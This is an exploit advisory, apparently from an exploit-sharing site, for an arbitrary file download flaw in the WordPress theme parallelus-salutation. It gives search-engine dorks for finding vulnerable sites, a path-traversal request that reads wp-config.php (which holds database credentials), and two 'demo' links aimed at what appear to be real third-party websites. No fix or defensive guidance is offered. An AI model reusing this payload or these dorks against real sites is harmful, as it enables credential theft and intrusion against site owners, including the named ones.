facebook facebook twitter rss

WordPress theme parallelus-salutation Arbitrary File Download Vulnerability

Author: Iran Cyber Security Group , Published: 24-12-2014
##############################################################
# Exploit Title: WordPress theme parallelus-salutation Arbitrary File Download Vulnerability .
#
# Exploit Author: Iran Cyber Security Group
#
# Discovered By: injector
#
# Dork 1: inurl:themes/parallelus-salutation/
#
# Dork 2: inurl:themes/parallelus-salutation/framework/
#
# Date: 18-12-2014
#
# Tested on: Kali, Win7
#
# Category: webapps
#
# platform: php
##############################################################
VULNERABILITY
##############
[~] VULNERABILITY}~~

[~] http://www.Site.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php


##############

demo 1: www.scarabresearch.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php

demo 2: http://www.patchingprotocol.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php

##############################################################
Contact number: +1 647 69 64 247
Contact mail: injector@rogers.com
-------------------Special Thanks of : All persian guys-------------------
##############################################################

Like us on Facebook :